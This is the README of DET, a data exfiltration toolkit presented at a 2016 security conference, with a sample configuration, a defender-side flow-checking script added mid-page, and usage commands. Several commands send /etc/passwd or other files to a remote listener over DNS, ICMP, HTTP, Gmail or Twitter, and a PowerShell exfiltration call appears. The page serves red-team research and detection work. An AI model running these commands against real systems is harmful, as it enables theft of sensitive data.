DET (provided AS IS) is a proof of concept for performing data exfiltration over a single channel or over multiple channels at the same time. The idea was to create a generic toolkit into which any kind of protocol/service can be plugged.
Slides
DET was presented at BSides Ljubljana on the 9th of March 2016. Slides are available here.
Example usage (ICMP plugin)
Server-side:
Client-side:
Usage while combining two channels (Gmail/Twitter)
Server-side:
Client-side:
Installation
Clone the repo:
git clone https://github.com/sensepost/DET.git
Then:
pip install -r requirements.txt --user
Configuration
In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided and is called:
config-sample.json
{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "dataexfil@gmail.com",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}
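A defender-side check for an authorised test run with a configuration like the one above, as an added example that is not part of DET: it maps the direct-connection plugins to the flows they should produce, reports which of those appear in flow records, and flags source/destination pairs that use several protocols at once. The plugin-to-transport mapping, the flow record layout, the function names and the sample records are assumptions constructed for illustration.

```python
import json
from collections import defaultdict
# Constructed sample: a subset of the plugins shown in config-sample.json.
CONFIG = json.loads("""{"plugins": {
  "http": {"target": "192.168.1.101", "port": 8080},
  "dns":  {"key": "google.com", "target": "192.168.1.101", "port": 53},
  "tcp":  {"target": "192.168.1.101", "port": 6969},
  "udp":  {"target": "192.168.1.101", "port": 6969},
  "icmp": {"target": "192.168.1.101"},
  "twitter": {"username": "PaulWebSec"}}}""")

# Assumption: the transport each plugin name implies (not stated on the page).
TRANSPORT = {"http": "tcp", "dns": "udp", "tcp": "tcp", "udp": "udp", "icmp": "icmp"}

def expected_channels(config):
    """Return ({(proto, dst, port)}, [plugins with no direct target]); port is None for ICMP."""
    direct, indirect = set(), []
    for name, opts in config["plugins"].items():
        if name in TRANSPORT and "target" in opts:
            direct.add((TRANSPORT[name], opts["target"], opts.get("port")))
        else:
            indirect.append(name)  # e.g. twitter: needs proxy/service-level logs instead
    return direct, sorted(indirect)

def multi_channel_pairs(flows, min_channels=3):
    """Flag (src, dst) pairs seen on >= min_channels distinct (proto, port) combinations."""
    seen = defaultdict(set)
    for src, proto, dst, port in flows:
        seen[(src, dst)].add((proto, port))
    return {pair: sorted(ch, key=str) for pair, ch in seen.items() if len(ch) >= min_channels}

def coverage(config, flows):
    """Split the configured direct channels into those present in the flow records and those absent."""
    direct, _ = expected_channels(config)
    observed = {(proto, dst, port) for _, proto, dst, port in flows}
    return {"seen": direct & observed, "missed": direct - observed}

# Constructed flow records: (src, proto, dst, dst_port)
FLOWS = [
    ("10.0.0.5", "tcp", "192.168.1.101", 8080),
    ("10.0.0.5", "udp", "192.168.1.101", 53),
    ("10.0.0.5", "icmp", "192.168.1.101", None),
    ("10.0.0.7", "tcp", "192.168.1.101", 8080),
    ("10.0.0.5", "tcp", "203.0.113.9", 443),
]

if __name__ == "__main__":
    print(multi_channel_pairs(FLOWS), coverage(CONFIG, FLOWS))
```

Channels listed under `missed` are ones the flow logging did not record during the test, which is where sensor coverage should be reviewed first.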
Usage
Help usage
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode
Server-side:
To load every plugin:
python det.py -L -c ./config.json
To load only twitter and gmail modules:
python det.py -L -c ./config.json -p twitter,gmail
To load every plugin and exclude DNS:
python det.py -L -c ./config.json -e dns
Client-side:
To load every plugin:
python det.py -c ./config.json -f /etc/passwd
To load only twitter and gmail modules:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
To load every plugin and exclude DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
And in PowerShell (HTTP module):
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
Modules
So far, DET supports multiple protocols, listed here:
- HTTP(S)
- ICMP
- DNS
- SMTP/IMAP (eg. Gmail)
- Raw TCP
- PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
- Google Docs (Unauthenticated)
- Twitter (Direct Messages)
Experimental modules
So far, I am busy implementing new modules which are almost ready to ship, including:
- Skype (95% done)
- Tor (80% done)
- Github (30/40% done)
Roadmap
- Add proper encryption (eg. AES-256)
- Compression (extremely important!)
- Proper data obfuscation and integrating Markovobfuscate
- FTP, FlickR LSB Steganography and Youtube modules
References
Some pretty cool references/credits to people whose projects inspired me:
- https://github.com/nullbind/Powershellery/ from Nullbind.
- https://github.com/ytisf/PyExfil , truly awesome.
- https://github.com/m57/dnsteal from m57.
- https://github.com/3nc0d3r/NaishoDeNusumu from 3nc0d3r.
- https://github.com/glennzw/exphil from Glenn Wilkinson.
- WebExfile from Saif El-Sherei